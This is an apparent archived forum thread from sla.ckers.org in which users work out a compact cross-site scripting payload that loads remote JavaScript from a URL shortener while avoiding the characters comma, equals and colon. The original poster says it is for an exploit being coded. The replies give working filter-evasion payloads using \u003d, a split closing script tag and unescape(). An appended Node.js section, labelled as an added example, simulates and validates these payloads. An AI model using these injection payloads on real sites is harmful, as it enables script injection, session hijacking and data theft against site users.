Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Loading a js in 80 chars without , = or :
Posted by: Neo139
Date: April 23, 2011 04:03AM

I have to load a js like <script src="http://something.com/a.js"></script>
but I can't use these three chars:

,
=
:

So this is where I am now, 92 chars:
<script>document.write("<script
src"+String.fromCharCode(61))</script>//qr.net/4ds></script>

When you use it in the code, the next HTML tag is </label>,
so it ends like this:
<script>document.write("<script
src"+String.fromCharCode(61))</script>//qr.net/4ds></script></label>

The next code makes the HTTP request for the js file but does not execute it (at least in FF3 and FF4):
<script>document.write("<script src"+String.fromCharCode(61))</script>//qr.net/4ds?
It's a shame it doesn't work :(
Any ideas? This one is hard :\

Re: Loading a js in 80 chars without , = or :
Posted by: barbarianbob
Date: April 23, 2011 04:02PM

Your closing tag in the document.write is terminating the script tag early. Split it up into a concatenation:

<script>document.write("<script src\u003d'//qr.net/4ds'></scr"+"ipt>")</script>



Edited 1 time(s). Last edit at 04/23/2011 04:03PM by barbarianbob.

Re: Loading a js in 80 chars without , = or :
Posted by: Neo139
Date: April 23, 2011 05:32PM

Thanks!!!!!!!!!!!!!!!
amazing
I will give you credit in the exploit I'm coding ^_^

It was 4am when I posted and I was so tired I posted in the Jobs subforum without knowing. Sorry.

Also I found that // is http:// only if you are in a web page that is http://;
if you are in https://, then // translates to https://.
So now I need to find a URL shortener that has https.

EDIT: bit.ly has SSL ^^



Edited 1 time(s). Last edit at 04/23/2011 06:21PM by Neo139.

Re: Loading a js in 80 chars without , = or :
Posted by: Kyo
Date: April 26, 2011 09:05AM

You can also use unescape() if you're short on space and backslashes don't work.

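The following is an added example, not code from any post in this thread. It models the one fact barbarianbob's fix relies on, that the HTML tokenizer ends an inline <script> at the first "</script" it sees and knows nothing about JavaScript string quoting, then runs each payload's script body against a stub document to show what actually gets written. It also checks the three banned characters and the 80-char budget, covers Kyo's unescape() variant, and shows Neo139's point about "//" inheriting the page's scheme. The page URLs (victim.example) are made up for the demonstration; the qr.net payloads are the ones from the thread.

```javascript
// Added example (not from the thread). Node.js, no dependencies.

// Return the body of the first inline <script> and the HTML left after its
// closing tag. This deliberately mimics only the tokenizer's "script data"
// state: the body ends at the first "</script", whatever JS quoting says.
function splitInlineScript(html) {
  const open = html.indexOf("<script>");
  if (open < 0) return null;
  const start = open + "<script>".length;
  const end = html.indexOf("</script", start);
  const body = end < 0 ? html.slice(start) : html.slice(start, end);
  const afterTag = end < 0 ? html.length : html.indexOf(">", end) + 1;
  return { body, rest: html.slice(afterTag) };
}

// Execute a script body with a stub document and collect what it writes.
// A real browser would feed that text back into the HTML parser in place.
function simulateDocumentWrite(body) {
  const written = [];
  const stubDocument = { write: (s) => written.push(s) };
  new Function("document", body)(stubDocument);
  return written.join("");
}

// The constraint from the original post: no comma, equals sign or colon.
const BANNED = [",", "=", ":"];
function forbiddenChars(payload) {
  return BANNED.filter((c) => payload.includes(c));
}

// Neo139's 92-char attempt (from the thread): the inline script is closed
// early on purpose and the URL is left as trailing HTML, which the browser
// glues onto the written "<script src=".
const naive = String.raw`<script>document.write("<script src"+String.fromCharCode(61))</script>//qr.net/4ds></script>`;

// barbarianbob's 79-char version (from the thread): \u003d is decoded by the
// JS engine, not the HTML parser, and "</scr"+"ipt>" keeps the literal text
// "</script" out of the raw source so the outer script is not cut short.
const fixed = String.raw`<script>document.write("<script src\u003d'//qr.net/4ds'></scr"+"ipt>")</script>`;

// Kyo's alternative when backslash escapes are not available: unescape("%3D") is "=".
const viaUnescape = String.raw`<script>document.write("<script src"+unescape("%3D")+"'//qr.net/4ds'></scr"+"ipt>")</script>`;

// Neo139's follow-up: a scheme-relative "//host/path" takes the including
// page's scheme, so an http-only shortener fails from an https page.
function resolveProtocolRelative(src, pageUrl) {
  return new URL(src, pageUrl).href;
}

for (const [name, payload] of [["naive", naive], ["fixed", fixed], ["unescape", viaUnescape]]) {
  const { body, rest } = splitInlineScript(payload);
  console.log(`${name}: ${payload.length} chars, banned=${JSON.stringify(forbiddenChars(payload))}`);
  console.log(`  writes: ${simulateDocumentWrite(body)}`);
  console.log(`  leftover HTML: ${JSON.stringify(rest)}`);
}
console.log(resolveProtocolRelative("//qr.net/4ds", "https://victim.example/page"));
```

The naive payload only works because the leftover HTML (`//qr.net/4ds></script>`) happens to complete the tag the script wrote, which is what costs the extra 13 characters; the split-tag version writes the whole `<script src='//qr.net/4ds'></script>` from inside one script and comes in at 79 characters.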
Re: Loading a js in 80 chars without , = or :
Posted by: VMw4r3
Date: April 26, 2011 03:51PM

http://seclists.org/fulldisclosure/2011/Apr/393
